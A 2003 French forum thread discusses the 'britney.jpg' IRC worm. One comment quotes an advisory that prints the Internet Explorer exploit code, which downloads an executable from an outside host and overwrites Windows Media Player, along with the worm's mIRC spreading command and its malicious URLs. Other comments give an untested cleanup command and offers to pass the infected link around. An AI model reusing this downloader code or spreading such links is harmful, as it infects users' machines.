GénéralNe jouez pas avec Britney

19 commentaires pour “Ne jouez pas avec Britney”

1. dredgerman69 a dit (le 27-10-2003 à 13:20)
   Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
2. 1for-matik a dit (le 27-10-2003 à 13:33)
   Quote:

   Originally Posted by dredgerman69 Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici

   G peur :confused: !
   Norton n'a même pas encor publié son patch :confused:
   
3. rog62 a dit (le 27-10-2003 à 13:34)
   Quote:

   Originally Posted by dredgerman69 Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici

   Donc, si j'ai bien compris... il faut même se méfier de Minou...
4. Cougar a dit (le 27-10-2003 à 13:40)
   ben le lien http://charmy.tky.hut.fi/brit.txt ne contient aucun virus/ver/...
   
   Aussi bien benjy, formatman et moi n'avons eu aucun problèmes en allant sur ce lien.
   
   voilà ce qu'il contient :
   

   Quote:

   2003-10-26 15:15 (+0200)DO NOT CLICK ON britney.jpg!!!Under no circumstances open an URL that ends with britney.jpg. It is actuallyan Internet Explorer / Windows Media Player exploit, as shown below.-----var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";-----patch.exe seems to be compressed with UPX, interesting strings can be found within.0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!This is a command it sends automatically to mIRC. This causes mIRC to send theexploit URL to all channels you are in.It will replace/delete Windows system files. If that happens, you might get amessage of this sort: "Files that are required for Windows to run properly havebeen replaced by unrecognized versions".This is NOT the same thing as http://koti.phnet.fi/jonninen/mircwo...tny.txt.15:30: At this time I don't know if the worm can be removed. If it manages to deleteyour Windows system files, you'll have to reinstall Windows.15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit theyare hosting.16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) inEFnet.According to reports, simply "repairing" the Windows install or copying the deletedfiles back isn't enough, since the virus also messes around with the Windows registry.You'll have to reinstall Windows.16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. 16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.17:00: There's a list of Windows system files in the uncompressed version of patch.exestarting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,userinit.exe, services.exe, etc. There are also references to some anti-virus andfirewall programs in the immediate vicinity. The virus probably disables theseprograms so that it can roam freely.Reports say that the virus does not affect Windows 98, but it definitely affectsat least Windows 2000 and XP. Anti-virus software does not help you at this point,since none of them recognize the virus yet.The scavenger.sharewith.us site has been disabled. This prevents the virus frominfecting machines for now, but the Angelfire page is still up and the author ofthe virus could modify the page to point to another location.The IE exploit: http://www.security.nnov.ru/search/d...cid=510217:30: The virus might not affect Windows Media Player version 8. (seehttp://www.kb.cert.org/vuls/id/222044)19:10: According to reports, the virus does affect WMP 8 as well. Better not openany suspicious links as long as you use IE.2003-10-26 19:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.

5. Benjy a dit (le 27-10-2003 à 13:47)
   C'est parce que ton antivirus s'affole à cause de l'extrait de code VB.
6. dredgerman69 a dit (le 27-10-2003 à 15:41)
   Ben Surment mais comme ça ça prouve que mon Pc est ultra securisé contre les virus et les cheveaux de troie
7. ThOMaZ2118 a dit (le 27-10-2003 à 16:36)
   si vous l'avez vous n'etes pas encore obligé deformatter...
   Cette ligne de texte dans votre client IRC devrai aussi pouvoir le suprimer (je n'ai pas tester):
   //unload -rs script.ini | write -c script.ini | remove script.ini | run command.com /c attrib.exe -r mirc.ini | ignore -r
   
   et le programme ici aussi (non plus pas testé): http://dronehunt.jbdesign.net/clean/spydll-clean.exe
   
   J'espere que ca poura aider qq1
8. Cougar a dit (le 27-10-2003 à 17:08)
   ben j'ai plusieurs copains qui ont testé le spydll-clean.exe sans succès.
   
   dredgerman69, si tu veux je t'envoie le link en pv pour tester ta sécurité
9. traducman a dit (le 28-10-2003 à 02:54)
   Quote:

   http://www.symantec.com/avcenter/venc/data/irc.trojan.fgt.html

   ! mettez à jour NAV !
   

   Quote:

   http://securityresponse.symantec.com/avcenter/download/pages/FR-N95.html

10. Werner a dit (le 28-10-2003 à 08:08)
    Ah c'est pas trop tôt mieux vos tard que jamais comme on dit
    
    Enfin ils ont été mauvais sur ce coup car ils l'ont découvert que dimanche alors que ce virus traîne depuis vendredi (voir même avant).
11. LeMoi a dit (le 28-10-2003 à 12:10)
    bah au contraire, de dimanche à vendredi, c'est plutot pas mal...
    sinon, comment qu'on le chope ce virus ? formatman l'a fait exprès ou bien l'a vraiment eu ? et a-t-il vraiment formatté lui aussi (D'après son pseudo, ça changerait pas trop de sa routine ?
12. Fred a dit (le 28-10-2003 à 13:40)
    Ils disent qu'il exploite une faille IE/MediaPlayer : est-ce que ca signifie que nous sommes protégé avec les dernières maj IE ou Microsoft va-t-il sortir un nouveau patch ?
    
    Ca me fait penser qu'une nouvelle MAJ DVD MediaPlayer vient de sortir -> direction WU
13. Werner a dit (le 28-10-2003 à 14:26)
    Oui j'ai fais exprès de me le chopper j'avais mon DVDR avec l'image du système qui était prêt et comme je voulais tout rebalancer ça tombait bien.
    
    Donc le Cougar me donne le lien, avant je regarde Windows Update et les maj de Norton et rien. Donc en gros j'étais parfaitement à jour et tout le système est parti en miette en quelques minutes ça prouve une nouvelle fois que les antivirus ne servent à rien car aujourd'hui vous avez peut-être la mise à jour pour ce virus mais demain vous ne l'aurez peut-être pas à temps.
    
    Je me suis passé pdt de longue année d'antivirus car c'est cher et ça consomme des ressources inutilement (même au boulot on en avait un à une époque et maintenant plus aucun ). Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.
14. LeMoi a dit (le 28-10-2003 à 16:30)
    Quote:

    Originally Posted by Formatman Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.

    Exactement, c'est le meilleur moyen c'est pour ça que j'en ai pas, ni mm de firewall
15. Fred a dit (le 28-10-2003 à 16:40)
    Quote:

    Originally Posted by Formatman Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.

    ... et de mettre à jour son système avec le SP1b
    Perso, je n'utilise pas d'antivirus non plus, et j'ai mis AVG sur le portable de ma belle mère, jusqu'ici on n'a jamais été embêté. Le firewall de Windows XP a suffit à nous protéger contre Blaster, et comme je n'utilise pas IRC et que je fais gaffe où je clique et à mes emails (Copyright Format ), j'ai pas de soucis. Après tu peux avoir des bêbêtes vicieuses qui utilisent des failles récentes mais c'est franchement plus rare, et quand on regarde les virus qui ont fait le plus de dégâts dernièrement, c'est encore des conneries de mails ...
    
    Comme je l'ai dit, un petit Firewall, même celui de Windows XP, n'est pas de refus, et une bonne sauvegarde périodique (sur une partition cachée si vous n'avez pas les $$ de Format pour vous acheter un graveur de DVD ) sont le meilleur remède contre les attaques en général, et les virus en particulier.
    
    PS : On peut aussi considérer comme attaque les potes de ton petit frêre qui viennent te polluer ta machine de photos de c** et de jeux débiles
16. Werner a dit (le 28-10-2003 à 19:27)
    >>> PS : On peut aussi considérer comme attaque les potes de ton petit frêre qui viennent te polluer ta machine de photos de c** et de jeux débiles
    
    C'est ce qu'il y a de pire
17. Fred a dit (le 28-10-2003 à 20:17)
    Quote:

    Originally Posted by Formatman C'est ce qu'il y a de pire

    Reste à patcher son petit frêre et chrooter ses potes
18. Cougar a dit (le 01-11-2003 à 15:43)
    Faites attention à celui qui se cache derrière ce lien http://www.angelfire.com/---/pics33/jessica_alba.jpg
    
    Je sais pas encore si c'est une variante et si le "fix" contre britney fonctionne contre celui là.
19. stan a dit (le 01-11-2003 à 19:50)
    Il va falloir éviter toutes les célébrités féminines si ça continue

Ajouter un commentaire